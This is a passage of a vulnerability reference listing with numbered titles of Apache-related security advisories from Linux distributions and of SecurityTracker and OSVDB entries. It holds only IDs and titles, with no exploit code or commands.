11194| [65249] SLES9: Security update for Apache 2
11195| [65230] SLES9: Security update for Apache 2
11196| [65228] SLES9: Security update for Apache 2
11197| [65212] SLES9: Security update for apache2-mod_python
11198| [65209] SLES9: Security update for apache2-worker
11199| [65207] SLES9: Security update for Apache 2
11200| [65168] SLES9: Security update for apache2-mod_python
11201| [65142] SLES9: Security update for Apache2
11202| [65136] SLES9: Security update for Apache 2
11203| [65132] SLES9: Security update for apache
11204| [65131] SLES9: Security update for Apache 2 oes/CORE
11205| [65113] SLES9: Security update for apache2
11206| [65072] SLES9: Security update for apache and mod_ssl
11207| [65017] SLES9: Security update for Apache 2
11208| [64950] Mandrake Security Advisory MDVSA-2009:240 (apache)
11209| [64783] FreeBSD Ports: apache
11210| [64774] Ubuntu USN-802-2 (apache2)
11211| [64653] Ubuntu USN-813-2 (apache2)
11212| [64559] Debian Security Advisory DSA 1834-2 (apache2)
11213| [64532] Mandrake Security Advisory MDVSA-2009:189 (apache-mod_auth_mysql)
11214| [64527] Mandrake Security Advisory MDVSA-2009:184 (apache-mod_security)
11215| [64526] Mandrake Security Advisory MDVSA-2009:183 (apache-mod_security)
11216| [64500] Mandrake Security Advisory MDVSA-2009:168 (apache)
11217| [64443] Ubuntu USN-802-1 (apache2)
11218| [64426] Gentoo Security Advisory GLSA 200907-04 (apache)
11219| [64423] Debian Security Advisory DSA 1834-1 (apache2)
11220| [64391] Mandrake Security Advisory MDVSA-2009:149 (apache)
11221| [64377] Mandrake Security Advisory MDVSA-2009:124-1 (apache)
11222| [64251] Debian Security Advisory DSA 1816-1 (apache2)
11223| [64201] Ubuntu USN-787-1 (apache2)
11224| [64140] Mandrake Security Advisory MDVSA-2009:124 (apache)
11225| [64136] Mandrake Security Advisory MDVSA-2009:102 (apache)
11226| [63565] FreeBSD Ports: apache
11227| [63562] Ubuntu USN-731-1 (apache2)
11228| [61381] Gentoo Security Advisory GLSA 200807-06 (apache)
11229| [61185] FreeBSD Ports: apache
11230| [60582] Gentoo Security Advisory GLSA 200803-19 (apache)
11231| [60387] Slackware Advisory SSA:2008-045-02 apache
11232| [58826] FreeBSD Ports: apache-tomcat
11233| [58825] FreeBSD Ports: apache-tomcat
11234| [58804] FreeBSD Ports: apache
11235| [58745] Gentoo Security Advisory GLSA 200711-06 (apache)
11236| [58360] Debian Security Advisory DSA 1312-1 (libapache-mod-jk)
11237| [57851] Gentoo Security Advisory GLSA 200608-01 (apache)
11238| [57788] Debian Security Advisory DSA 1247-1 (libapache-mod-auth-kerb)
11239| [57335] Debian Security Advisory DSA 1167-1 (apache)
11240| [57201] Debian Security Advisory DSA 1131-1 (apache)
11241| [57200] Debian Security Advisory DSA 1132-1 (apache2)
11242| [57168] Slackware Advisory SSA:2006-209-01 Apache httpd
11243| [57145] FreeBSD Ports: apache
11244| [56731] Slackware Advisory SSA:2006-129-01 Apache httpd
11245| [56729] Slackware Advisory SSA:2006-130-01 Apache httpd redux
11246| [56246] Gentoo Security Advisory GLSA 200602-03 (Apache)
11247| [56212] Debian Security Advisory DSA 952-1 (libapache-auth-ldap)
11248| [56115] Debian Security Advisory DSA 935-1 (libapache2-mod-auth-pgsql)
11249| [56067] FreeBSD Ports: apache
11250| [55803] Slackware Advisory SSA:2005-310-04 apache
11251| [55519] Debian Security Advisory DSA 839-1 (apachetop)
11252| [55392] Gentoo Security Advisory GLSA 200509-12 (Apache)
11253| [55355] FreeBSD Ports: apache
11254| [55284] Debian Security Advisory DSA 807-1 (libapache-mod-ssl)
11255| [55261] Debian Security Advisory DSA 805-1 (apache2)
11256| [55259] Debian Security Advisory DSA 803-1 (apache)
11257| [55129] Gentoo Security Advisory GLSA 200508-15 (apache)
11258| [54739] Gentoo Security Advisory GLSA 200411-18 (apache)
11259| [54724] Gentoo Security Advisory GLSA 200411-03 (apache)
11260| [54712] Gentoo Security Advisory GLSA 200410-21 (apache)
11261| [54689] Gentoo Security Advisory GLSA 200409-33 (net=www/apache)
11262| [54677] Gentoo Security Advisory GLSA 200409-21 (apache)
11263| [54610] Gentoo Security Advisory GLSA 200407-03 (Apache)
11264| [54601] Gentoo Security Advisory GLSA 200406-16 (Apache)
11265| [54590] Gentoo Security Advisory GLSA 200406-05 (Apache)
11266| [54582] Gentoo Security Advisory GLSA 200405-22 (Apache)
11267| [54529] Gentoo Security Advisory GLSA 200403-04 (Apache)
11268| [54499] Gentoo Security Advisory GLSA 200310-04 (Apache)
11269| [54498] Gentoo Security Advisory GLSA 200310-03 (Apache)
11270| [54439] FreeBSD Ports: apache
11271| [53931] Slackware Advisory SSA:2004-133-01 apache
11272| [53903] Slackware Advisory SSA:2004-299-01 apache, mod_ssl, php
11273| [53902] Slackware Advisory SSA:2004-305-01 apache+mod_ssl
11274| [53878] Slackware Advisory SSA:2003-308-01 apache security update
11275| [53851] Debian Security Advisory DSA 135-1 (libapache-mod-ssl)
11276| [53849] Debian Security Advisory DSA 132-1 (apache-ssl)
11277| [53848] Debian Security Advisory DSA 131-1 (apache)
11278| [53784] Debian Security Advisory DSA 021-1 (apache)
11279| [53738] Debian Security Advisory DSA 195-1 (apache-perl)
11280| [53737] Debian Security Advisory DSA 188-1 (apache-ssl)
11281| [53735] Debian Security Advisory DSA 187-1 (apache)
11282| [53703] Debian Security Advisory DSA 532-1 (libapache-mod-ssl)
11283| [53577] Debian Security Advisory DSA 120-1 (libapache-mod-ssl, apache-ssl)
11284| [53568] Debian Security Advisory DSA 067-1 (apache,apache-ssl)
11285| [53519] Debian Security Advisory DSA 689-1 (libapache-mod-python)
11286| [53433] Debian Security Advisory DSA 181-1 (libapache-mod-ssl)
11287| [53282] Debian Security Advisory DSA 594-1 (apache)
11288| [53248] Debian Security Advisory DSA 558-1 (libapache-mod-dav)
11289| [53224] Debian Security Advisory DSA 532-2 (libapache-mod-ssl)
11290| [53215] Debian Security Advisory DSA 525-1 (apache)
11291| [53151] Debian Security Advisory DSA 452-1 (libapache-mod-python)
11292| [52529] FreeBSD Ports: apache+ssl
11293| [52501] FreeBSD Ports: apache
11294| [52461] FreeBSD Ports: apache
11295| [52390] FreeBSD Ports: apache
11296| [52389] FreeBSD Ports: apache
11297| [52388] FreeBSD Ports: apache
11298| [52383] FreeBSD Ports: apache
11299| [52339] FreeBSD Ports: apache+mod_ssl
11300| [52331] FreeBSD Ports: apache
11301| [52329] FreeBSD Ports: ru-apache+mod_ssl
11302| [52314] FreeBSD Ports: apache
11303| [52310] FreeBSD Ports: apache
11304| [15588] Detect Apache HTTPS
11305| [15555] Apache mod_proxy content-length buffer overflow
11306| [15554] Apache mod_include priviledge escalation
11307| [14771] Apache <= 1.3.33 htpasswd local overflow
11308| [14177] Apache mod_access rule bypass
11309| [13644] Apache mod_rootme Backdoor
11310| [12293] Apache Input Header Folding and mod_ssl ssl_io_filter_cleanup DoS Vulnerabilities
11311| [12280] Apache Connection Blocking Denial of Service
11312| [12239] Apache Error Log Escape Sequence Injection
11313| [12123] Apache Tomcat source.jsp malformed request information disclosure
11314| [12085] Apache Tomcat servlet/JSP container default files
11315| [11438] Apache Tomcat Directory Listing and File disclosure
11316| [11204] Apache Tomcat Default Accounts
11317| [11092] Apache 2.0.39 Win32 directory traversal
11318| [11046] Apache Tomcat TroubleShooter Servlet Installed
11319| [11042] Apache Tomcat DOS Device Name XSS
11320| [11041] Apache Tomcat /servlet Cross Site Scripting
11321| [10938] Apache Remote Command Execution via .bat files
11322| [10839] PHP.EXE / Apache Win32 Arbitrary File Reading Vulnerability
11323| [10773] MacOS X Finder reveals contents of Apache Web files
11324| [10766] Apache UserDir Sensitive Information Disclosure
11325| [10756] MacOS X Finder reveals contents of Apache Web directories
11326| [10752] Apache Auth Module SQL Insertion Attack
11327| [10704] Apache Directory Listing
11328| [10678] Apache /server-info accessible
11329| [10677] Apache /server-status accessible
11330| [10440] Check for Apache Multiple / vulnerability
11331|
11332| SecurityTracker - https://www.securitytracker.com:
11333| [1028865] Apache Struts Bugs Permit Remote Code Execution and URL Redirection Attacks
11334| [1028864] Apache Struts Wildcard Matching and Expression Evaluation Bugs Let Remote Users Execute Arbitrary Code
11335| [1028824] Apache mod_dav_svn URI Processing Flaw Lets Remote Users Deny Service
11336| [1028823] Apache Unspecified Flaw in mod_session_dbd Has Unspecified Impact
11337| [1028724] (HP Issues Fix for HP-UX) Apache Web Server Bugs Permit Cross-Site Scripting and Information Disclosure Attacks
11338| [1028722] (Red Hat Issues Fix for JBoss) Apache Tomcat Lets Remote Users Conduct DIGEST Authentication Replay Attacks
11339| [1028693] (Red Hat Issues Fix) Apache Tomcat FORM Authenticator Lets Remote Users Conduct Session Fixation Attacks
11340| [1028622] Apache Struts 'includeParams' Bugs Permit Remote Command Execution and Cross-Site Scripting Attacks
11341| [1028621] Apache Subversion Bugs Let Remote Authenticated Users Execute Arbitrary Commands and Deny Service
11342| [1028540] Apache mod_rewrite Input Validation Flaw Lets Remote Users Execute Arbitrary Commands
11343| [1028534] Apache Tomcat FORM Authenticator Lets Remote Users Conduct Session Fixation Attacks
11344| [1028533] Apache Tomcat Lack of Chunked Transfer Encoding Extension Size Limit Lets Remote Users Deny Service
11345| [1028532] Apache Tomcat AsyncListeners Bug May Disclose Information from One Request to Another User
11346| [1028515] Apache VCL Input Validation Flaw Lets Remote Authenticated Users Gain Elevated Privileges
11347| [1028457] Apache ActiveMQ Bugs Let Remote Users Conduct Cross-Site Scripting Attacks, Deny Service, and Obtain Potentially Sensitive Information
11348| [1028287] Apache CXF WSS4JInInterceptor Grants Service Access to Remote Users
11349| [1028286] Apache CXF WS-Security UsernameToken Processing Flaw Lets Remote Users Bypass Authentication
11350| [1028252] Apache Commons FileUpload Unsafe Temporary File Lets Local Users Gain Elevated Privileges
11351| [1028207] Apache Input Validation Bugs Permit Cross-Site Scripting Attacks
11352| [1027836] Apache Tomcat Connection Processing Bug Lets Remote Users Deny Service
11353| [1027834] Apache Tomcat Bug Lets Remote Users Bypass Cross-Site Request Forgery Prevention Filter
11354| [1027833] Apache Tomcat Bug Lets Remote Users Bypass Security Constraints
11355| [1027729] Apache Tomcat Header Processing Bug Lets Remote Users Deny Service
11356| [1027728] Apache Tomcat Lets Remote Users Conduct DIGEST Authentication Replay Attacks
11357| [1027554] Apache CXF Lets Remote Authenticated Users Execute Unauthorized SOAP Actions
11358| [1027508] Apache Wicket Input Validation Flaw Permits Cross-Site Scripting Attacks
11359| [1027421] Apache Web Server Bugs Permit Cross-Site Scripting and Information Disclosure Attacks
11360| [1027096] Apache Commons Compress BZip2CompressorOutputStream() Sorting Algorithm Lets Remote or Local Users Deny Service
11361| [1026932] Apache LD_LIBRARY_PATH Processing Lets Local Users Gain Elevated Privileges
11362| [1026928] Apache OFBiz Unspecified Flaw Lets Remote Users Execute Arbitrary Code
11363| [1026927] Apache OFBiz Input Validation Flaws Permit Cross-Site Scripting Attacks
11364| [1026847] Apache Traffic Server Host Header Processing Flaw Lets Remote Users Deny Service
11365| [1026846] Apache Wicket Discloses Hidden Application Files to Remote Users
11366| [1026839] Apache Wicket Input Validation Flaw in 'wicket:pageMapName' Parameter Permits Cross-Site Scripting Attacks
11367| [1026616] Apache Bugs Let Remote Users Deny Service and Obtain Cookie Data
11368| [1026575] Apache Struts ParameterInterceptor() Flaw Lets Remote Users Execute Arbitrary Commands
11369| [1026484] Apache Struts Bug Lets Remote Users Overwrite Files and Execute Arbitrary Code
11370| [1026477] Apache Tomcat Hash Table Collision Bug Lets Remote Users Deny Service
11371| [1026402] Apache Struts Conversion Error Lets Remote Users Inject Arbitrary Commands
11372| [1026353] Apache mod_proxy/mod_rewrite Bug Lets Remote Users Access Internal Servers
11373| [1026295] Apache Tomcat Lets Untrusted Web Applications Gain Elevated Privileges
11374| [1026267] Apache .htaccess File Integer Overflow Lets Local Users Execute Arbitrary Code
11375| [1026144] Apache mod_proxy Pattern Matching Bug Lets Remote Users Access Internal Servers
11376| [1026095] Apache Tomcat HTTP DIGEST Authentication Weaknesses Let Remote Users Conduct Bypass Attacks
11377| [1026054] Apache mod_proxy_ajp HTTP Processing Error Lets Remote Users Deny Service
11378| [1025993] Apache Tomcat AJP Protocol Processing Bug Lets Remote Users Bypass Authentication or Obtain Information
11379| [1025976] Apache Wicket Input Validation Flaw Permits Cross-Site Scripting Attacks
11380| [1025960] Apache httpd Byterange Filter Processing Error Lets Remote Users Deny Service
11381| [1025925] Apache Tomcat Commons Daemon jsvc Lets Local Users Gain Elevated Privileges
11382| [1025924] Apache Tomcat XML Validation Flaw Lets Applications Obtain Potentially Sensitive Information
11383| [1025788] Apache Tomcat Lets Malicious Applications Obtain Information and Deny Service
11384| [1025755] Apache Santuario Buffer Overflow Lets Remote Users Deny Service
11385| [1025712] Apache Tomcat Discloses Passwords to Local Users in Certain Cases
11386| [1025577] Apache Archiva Input Validation Hole Permits Cross-Site Scripting Attacks
11387| [1025576] Apache Archiva Request Validation Flaw Permits Cross-Site Request Forgery Attacks
11388| [1025527] Apache APR Library apr_fnmatch() Flaw Lets Remote Users Execute Arbitrary Code
11389| [1025303] Apache Tomcat HTTP BIO Connector Error Discloses Information From Different Requests to Remote Users
11390| [1025215] Apache Tomcat May Ignore @ServletSecurity Annotation Protections
11391| [1025066] Apache Continuum Input Validation Flaw Permits Cross-Site Request Forgery Attacks
11392| [1025065] Apache Continuum Input Validation Hole Permits Cross-Site Scripting Attacks
11393| [1025027] Apache Tomcat maxHttpHeaderSize Parsing Error Lets Remote Users Deny Service
11394| [1025026] Apache Tomcat Manager Input Validation Hole Permits Cross-Site Scripting Attacks
11395| [1025025] Apache Tomcat Security Manager Lets Local Users Bypass File Permissions
11396| [1024764] Apache Tomcat Manager Input Validation Hole in 'sessionList.jsp' Permits Cross-Site Scripting Attacks
11397| [1024417] Apache Traffic Server Insufficient Randomization Lets Remote Users Poison the DNS Cache
11398| [1024332] Apache mod_cache and mod_dav Request Processing Flaw Lets Remote Users Deny Service
11399| [1024180] Apache Tomcat 'Transfer-Encoding' Header Processing Flaw Lets Remote Users Deny Service and Obtain Potentially Sensitive Information
11400| [1024096] Apache mod_proxy_http May Return Results for a Different Request
11401| [1023942] Apache mod_proxy_ajp Error Condition Lets Remote Users Deny Service
11402| [1023941] Apache ap_read_request() Memory Error May Let Remote Users Access Potentially Sensitive Information
11403| [1023778] Apache ActiveMQ Input Validation Flaw Permits Cross-Site Scripting Attacks
11404| [1023701] Apache mod_isapi Error Processing Flaw May Let Remote Users Deny Service
11405| [1023533] Apache mod_proxy Integer Overflow May Let Remote Users Execute Arbitrary Code
11406| [1022988] Apache Solaris Support Code Bug Lets Remote Users Deny Service
11407| [1022529] Apache mod_deflate Connection State Bug Lets Remote Users Deny Service
11408| [1022509] Apache mod_proxy stream_reqbody_cl() Infinite Loop Lets Remote Users Deny Service
11409| [1022296] Apache IncludesNoExec Options Restrictions Can Be Bypass By Local Users
11410| [1022264] Apache mod_proxy_ajp Bug May Disclose Another User's Response Data
11411| [1022001] Apache Tomcat mod_jk May Disclose Responses to the Wrong User
11412| [1021988] mod_perl Input Validation Flaw in Apache::Status and Apache2::Status Permits Cross-Site Scripting Attacks
11413| [1021350] NetWare Bug Lets Remote Users Access the ApacheAdmin Console
11414| [1020635] Apache Input Validation Hole in mod_proxy_ftp Permits Cross-Site Scripting Attacks
11415| [1020520] Oracle WebLogic Apache Connector Lets Remote Users Execute Arbitrary Code
11416| [1020267] Apache mod_proxy Interim Response Process Bug Lets Remote Users Deny Service
11417| [1019784] Apache-SSL Certificate Processing Bug May Let Remote Users View Portions of Kernel Memory
11418| [1019256] Apache mod_negotiation Input Validation Hole Permits Cross-Site Scripting Attacks
11419| [1019194] Apache Input Validation Hole in Mod_AutoIndex When the Character Set is Undefined May Permit Cross-Site Scripting Attacks
11420| [1019185] Apache Input Validation Hole in mod_proxy_ftp Permits Cross-Site Scripting Attacks
11421| [1019154] Apache Input Validation Hole in mod_status Permits Cross-Site Scripting Attacks
11422| [1019093] Apache Input Validation Hole in mod_imap Permits Cross-Site Scripting Attacks
11423| [1019030] Apache Input Validation Hole in Default HTTP 413 Error Page Permits Cross-Site Scripting Attacks
11424| [1018633] Apache mod_proxy Bug Lets Remote Users Deny Service
11425| [1018304] Apache HTTPD scoreboard Protection Flaw Lets Local Users Terminate Arbitrary Processes
11426| [1018303] Apache HTTPD mod_cache May Let Remote Users Deny Service
11427| [1018302] Apache mod_status Input Validation Hole Permits Cross-Site Scripting Attacks
11428| [1018269] Apache Tomcat Input Validation Hole in Processing Accept-Language Header Permits Cross-Site Scripting Attacks
11429| [1017904] Apache suEXEC Bugs May Let Local Users Gain Elevated Privileges
11430| [1017719] Apache Tomcat JK Web Server Connector Buffer Overflow in map_uri_to_worker() Lets Remote Users Execute Arbitrary Code
11431| [1017062] Apache mod_tcl Format String Bug in set_var() Function May Let Remote Users Execute Arbitrary Code
11432| [1016601] Apache mod_rewrite Off-by-one Error Lets Remote Users Execute Arbitrary Code
11433| [1016576] Apache Tomcat Discloses Directory Listings to Remote Users
11434| [1015447] Apache mod_ssl Null Pointer Dereference May Let Remote Users Deny Service
11435| [1015344] Apache mod_imap Input Validation Flaw in Referer Field Lets Remote Users Conduct Cross-Site Scripting Attacks
11436| [1015093] Apache Memory Leak in MPM 'worker.c' Code May Let Remote Users Deny Service
11437| [1014996] ApacheTop Unsafe Temporary File May Let Local Users Gain Elevated Privileges
11438| [1014833] Apache ssl_hook_Access() Function May Fail to Verify Client Certificates
11439| [1014826] Apache Memory Leak in 'byterange filter' Lets Remote Users Deny Service
11440| [1014575] Apache mod_ssl Off-by-one Buffer Overflow in Processing CRLs May Let Remote Users Deny Service
11441| [1014323] Apache Chunked Transfer-Encoding and Content-Length Processing Lets Remote Users Smuggle HTTP Requests
11442| [1013156] Apache mod_python Publisher Handler Discloses Information to Remote Users
11443| [1012829] Apache mod_auth_radius radcpy() Integer Overflow Lets Remote Users Deny Service in Certain Cases
11444| [1012416] Apache on Apple OS X Lets Remote Users Bypass Apache File Handlers and Directly Access Files
11445| [1012415] Apache on Apple HFS+ Filesystems May Disclose '.DS_Store' Files to Remote Users
11446| [1012414] Apache mod_digest_apple Lets Remote Users Replay Authentication Credentials
11447| [1012083] Apache Web Server Error in Processing Requests With Many Space Characters Lets Remote Users Deny Service
11448| [1011783] Apache mod_include Buffer Overflow Lets Local Users Execute Arbitrary Code
11449| [1011557] Apache mod_ssl SSLCipherSuite Directive Can By Bypassed in Certain Cases
11450| [1011385] Apache Satsify Directive Error May Let Remote Users Access Restricted Resources
11451| [1011340] Apache SSL Connection Abort State Error Lets Remote Users Deny Service
11452| [1011303] Apache ap_resolve_env() Buffer Overflow in Reading Configuration Files May Let Local Users Gain Elevated Privileges
11453| [1011299] Apache IPv6 Address Parsing Flaw May Let Remote Users Deny Service
11454| [1011248] Apache mod_dav LOCK Method Error May Let Remote Users Deny Service
11455| [1011213] Apache mod_ssl Can Be Crashed By Remote Users When Reverse Proxying SSL Connections
11456| [1010674] Apache Can Be Crashed By PHP Code Invoking Nested Remote Sockets
11457| [1010599] Apache httpd Header Line Memory Allocation Lets Remote Users Crash the Server
11458| [1010462] Apache mod_proxy Buffer Overflow May Let Remote Users Execute Arbitrary Code
11459| [1010322] Apache mod_ssl Stack Overflow in ssl_util_uuencode_binary() May Let Remote Users Execute Arbitrary Code
11460| [1010270] cPanel Apache mod_phpsuexec Options Let Local Users Gain Elevated Privileges
11461| [1009934] Apache Web Server Has Buffer Overflow in ebcdic2ascii() on Older Processor Architectures
11462| [1009516] Apache mod_survey HTML Report Format Lets Remote Users Conduct Cross-Site Scripting Attacks
11463| [1009509] Apache mod_disk_cache Stores Authentication Credentials on Disk
11464| [1009495] Apache Web Server Socket Starvation Flaw May Let Remote Users Deny Service
11465| [1009417] GroupWise WebAccess With Apache on NetWare Has Configuration Flaw That May Grant Web Access to Remote Users
11466| [1009338] Apache mod_access Parsing Flaw May Fail to Enforce Allow/Deny Rules
11467| [1009337] Apache mod_ssl Memory Leak Lets Remote Users Crash the Daemon
11468| [1009182] Apache for Cygwin '..%5C' Input Validation Flaw Discloses Files to Remote Users
11469| [1008973] PHP May Apply Incorrect php_admin_* Settings To Requests for Apache Virtual Hosts
11470| [1008967] Apache-SSL 'SSLFakeBasicAuth' Lets Remote Users Forge Client Certificates to Be Authenticated
11471| [1008920] Apache mod_digest May Validate Replayed Client Responses
11472| [1008828] Apache mod_python String Processing Bug Still Lets Remote Users Crash the Web Server
11473| [1008822] Apache mod_perl File Descriptor Leak May Let Local Users Hijack the http and https Services
11474| [1008675] mod_auth_shadow Apache Module Authenticates Expired Passwords
11475| [1008559] Apache mod_php File Descriptor Leak May Let Local Users Hijack the https Service
11476| [1008335] Apache mod_python String Processing Bug Lets Remote Users Crash the Web Server
11477| [1008196] Apache 2.x on Windows May Return Unexpected Files For URLs Ending With Certain Characters
11478| [1008030] Apache mod_rewrite Contains a Buffer Overflow
11479| [1008029] Apache mod_alias Contains a Buffer Overflow
11480| [1008028] Apache mod_cgid May Disclose CGI Output to Another Client
11481| [1007995] Apache Cocoon Forms May Let Remote Users Execute Arbitrary Java Code on the System
11482| [1007993] Apache Cocoon 'view-source' Sample Script Discloses Files to Remote Users
11483| [1007823] Apache Web Server mod_cgi Error May Let Malicious CGI Scripts Crash the Web Service
11484| [1007664] Apache::Gallery Unsafe Temporary Files May Let Local Users Gain Apache Web Server Privileges
11485| [1007557] Apache Web Server Does Not Filter Terminal Escape Sequences From Log Files
11486| [1007230] Apache HTTP Server 'rotatelogs' Bug on Win32 and OS/2 May Cause the Logging to Stop
11487| [1007146] Apache HTTP Server FTP Proxy Bug May Cause Denial of Service Conditions
11488| [1007145] Apache 'accept()' Errors May Cause Denial of Service Conditions
11489| [1007144] Apache Web Server 'type-map' File Error Permits Local Denial of Service Attacks
11490| [1007143] Apache 2.0 Web Server May Use a Weaker Encryption Implementation Than Specified in Some Cases
11491| [1006864] Apache Web Server Can Be Crashed By Remote Users Via mod_dav Flaws and Also Via Basic Authentication
11492| [1006709] Apache mod_survey Input Validation Flaw Lets Remote Users Fill Up Disk Space
11493| [1006614] Apache mod_ntlm Buffer Overflow and Format String Flaw Let Remote Users Execute Arbitary Code
11494| [1006591] Apache mod_access_referer Module Null Pointer Dereference May Faciliate Denial of Service Attacks
11495| [1006444] Apache 2.0 Web Server Line Feed Buffer Allocation Flaw Lets Remote Users Deny Service
11496| [1006021] Apache Tomcat Server URL Parsing Error May Disclose Otherwise Inaccessible Web Directory Listings and Files to Remote Users
11497| [1005963] Apache Web Server 2.x Windows Device Access Flaw Lets Remote Users Crash the Server or Possibly Execute Arbitrary Code
11498| [1005962] Apache Web Server Path Parsing Flaw May Allow Remote Users to Execute Code in Certain Configurations
11499| [1005848] Apache 'printenv' Script Input Validation Bugs in Older Versions May Let Remote Users Conduct Cross-Site Scripting Attacks
11500| [1005765] Apache mod_jk Module Processing Bug When Used With Tomcat May Disclose Information to Remote Users or Crash
11501| [1005548] Apache mod_php Module May Allow Local Users to Gain Control of the Web Port
11502| [1005499] Apache Web Server (2.0.42) May Disclose CGI Source Code to Remote Users When Used With WebDAV
11503| [1005410] Apache Tomcat Java Servlet Engine Can Be Crashed Via Multiple Requests for DOS Device Names
11504| [1005351] Apache Web Server (1.3.x) Shared Memory Scoreboard Bug Lets Certain Local Users Issue Signals With Root Privileges
11505| [1005331] Apache Web Server (2.x) SSI Server Signature Filtering Hole Lets Remote Users Conduct Cross-Site Scripting Attacks
11506| [1005290] Apache Tomcat Java Server Default Servlet Returns JSP Source Code to Remote Users
11507| [1005285] Apache Web Server 'mod_dav' Has Null Pointer Bug That May Allow Remote Users to Cause Denial of Service Conditions
11508| [1005010] Apache Web Server (2.0) Has Unspecified Flaw That Allows Remote Users to Obtain Sensitive Data and Cause Denial of Service Conditions
11509| [1004770] Apache 2.x Web Server ap_log_rerror() Function May Disclose Full Installation Path to Remote Users
11510| [1004745] Apache Tomcat Java Server Allows Cross-Site Scripting Attacks
11511| [1004636] Apache mod_ssl 'Off-by-One' Bug May Let Local Users Crash the Web Server or Possibly Execute Arbitrary Code
11512| [1004602] Apache Tomcat Java Server for Windows Can Be Crashed By Remote Users Sending Malicious Requests to Hang All Available Working Threads
11513| [1004586] Apache Tomcat Java Server May Disclose the Installation Path to Remote Users
11514| [1004555] Apache Web Server Chunked Encoding Flaw May Let Remote Users Execute Arbitrary Code on the Server
11515| [1004209] Apache 'mod_python' Python Language Interpreter Bug in Publisher Handler May Allow Remote Users to Modify Files on the System
11516| [1003874] Apache Web Server for Windows Has Batch File Processing Hole That Lets Remote Users Execute Commands on the System
11517| [1003767] 'mod_frontpage' Module for Apache Web Server Has Buffer Overlow in 'fpexec.c' That Allows Remote Users to Execute Arbitrary Code on the System with Root Privileges
11518| [1003723] Apache-SSL for Apache Web Server Has Buffer Overflow That Can Be Triggered By Remote Users
11519| [1003664] 'mod_ssl' Security Package for Apache Web Server Has Buffer Overflow That Can Be Triggered By Remote Users
11520| [1003602] GNUJSP Java Server Pages Implementation Discloses Web Files and Source Code to Remote Users and Bypasses Apache Access Control Restrictions
11521| [1003465] PHP for Apache Web Server May Disclose Installation Path Information to Remote Users Making 'OPTIONS' Requests
11522| [1003451] Oracle Application Server PL/SQL Module for Apache Has Buffer Overflows That Allow Remote Users to Execute Arbitrary Code and Gain Access to the Server
11523| [1003131] Apache Web Server in Virtual Hosting Mode Can Be Crashed By a Local User Removing a Log Directory
11524| [1003104] PHP.EXE Windows CGI for Apache Web Server May Let Remote Users View Files on the Server Due to Configuration Error
11525| [1003008] Apache 'mod_bf' Module Lets Remote Users Execute Arbitrary Code
11526| [1002629] Apache suEXEC Wrapper Fails to Observe Minimum Group ID Security Settings in Certain Situations
11527| [1002542] Apache Web Server Virtual Hosting Split-Logfile Function Lets Remote Users Write Log Entries to Arbitrary Files on the System
11528| [1002400] Apache mod_gzip Module Has Buffer Overflow That Can Be Exploited By Local Users to Gain Elevated Privileges
11529| [1002303] Several 3rd Party Apache Authentication Modules Allow Remote Users to Execute Arbitrary Code to Gain Access to the System or Execute Stored Procedures to Obtain Arbitrary Database Information
11530| [1002188] Apache Web Server Discloses Internal IP Addresses to Remote Users in Certain Configurations
11531| [1001989] Apache Web Server May Disclose Directory Contents Even If an Index.html File is Present in the Directory
11532| [1001719] Apache Web Server on Mac OS X Client Fails to Enforce File and Directory Access Protections, Giving Remote Users Access to Restricted Pages
11533| [1001572] Apache Web Server on Microsoft Windows Platforms Allows Remote Users to Crash the Web Server
11534| [1001304] Apache Web Server for Windows Lets Remote Users Crash the Web Server Application
11535| [1001083] Apache Web Server May Display Directory Index Listings Even if Directory Listings Are Disabled
11536|
11537| OSVDB - http://www.osvdb.org:
11538| [96078] Apache CloudStack Infrastructure Menu Setup Network Multiple Field XSS
11539| [96077] Apache CloudStack Global Settings Multiple Field XSS
11540| [96076] Apache CloudStack Instances Menu Display Name Field XSS
11541| [96075] Apache CloudStack Instances Menu Add Instances Network Name Field XSS
11542| [96074] Apache CloudStack Instances Menu Add Instances Review Step Multiple Field XSS
11543| [96031] Apache HTTP Server suEXEC Symlink Arbitrary File Access
11544| [95888] Apache Archiva Single / Double Quote Character Handling XSS Weakness
11545| [95885] Apache Subversion mod_dav_svn Module Crafted HTTP Request Handling Remote DoS
11546| [95706] Apache OpenOffice.org (OOo) OOXML Document File XML Element Handling Memory Corruption
11547| [95704] Apache OpenOffice.org (OOo) DOC File PLCF Data Handling Memory Corruption
11548| [95603] Apache Continuum web/util/GenerateRecipentNotifier.java recipient Parameter XSS
11549| [95602] Apache Continuum web/action/notifier/JabberProjectNotifierEditAction-jabberProjectNotifierSave-validation.xml Multiple Parameter XSS
11550| [95601] Apache Continuum web/action/notifier/JabberGroupNotifierEditAction-jabberProjectGroupNotifierSave-validation.xml Multiple Parameter XSS
11551| [95600] Apache Continuum web/action/ScheduleAction-saveSchedule-validation.xml Multiple Parameter XSS
11552| [95599] Apache Continuumweb/action/BuildDefinitionAction-saveBuildDefinition-validation.xml Multiple Parameter XSS
11553| [95598] Apache Continuum web/action/AddProjectAction-addProject-validation.xml Multiple Parameter XSS
11554| [95597] Apache Continuum web/action/ProjectEditAction-projectSave-validation.xml Multiple Parameter XSS
11555| [95596] Apache Continuum web/action/notifier/IrcGroupNotifierEditAction-ircProjectGroupNotifierSave-validation.xml Multiple Parameter XSS
11556| [95595] Apache Continuum web/action/notifier/IrcProjectNotifierEditAction-ircProjectNotifierSave-validation.xml Multiple Parameter XSS
11557| [95594] Apache Continuum web/action/ProjectGroupAction.java Multiple Parameter XSS
11558| [95593] Apache Continuum web/action/AddProjectGroupAction.java Multiple Parameter XSS
11559| [95592] Apache Continuum web/action/AddProjectAction.java Multiple Parameter XSS
11560| [95523] Apache OFBiz Webtools Application View Log Screen Unspecified XSS
11561| [95522] Apache OFBiz Nested Expression Evaluation Arbitrary UEL Function Execution
11562| [95521] Apache HTTP Server mod_session_dbd Session Saving Unspecified Issue
11563| [95498] Apache HTTP Server mod_dav.c Crafted MERGE Request Remote DoS
11564| [95406] Apache Struts DefaultActionMapper Multiple Prefixing Parameters Arbitrary Site Redirect
11565| [95405] Apache Struts DefaultActionMapper Multiple Prefixing Parameters Remote Code Execution
11566| [95011] Apache CXF XML Parser SOAP Message Handling CPU Resource Exhaustion Remote DoS
11567| [94705] Apache Geronimo RMI Classloader Exposure Serialized Object Handling Remote Code Execution
11568| [94651] Apache Santuario (XML Security for C++) XML Signature CanonicalizationMethod Parameter Spoofing Weakness
11569| [94636] Apache Continuum workingCopy.action userDirectory Traversal Arbitrary File Access
11570| [94635] Apache Maven SCM SvnCommandlineUtils Process Listing Local Password Disclosure
11571| [94632] Apache Maven Wagon SSH (wagon-ssh) Host Verification Failure MitM Weakness
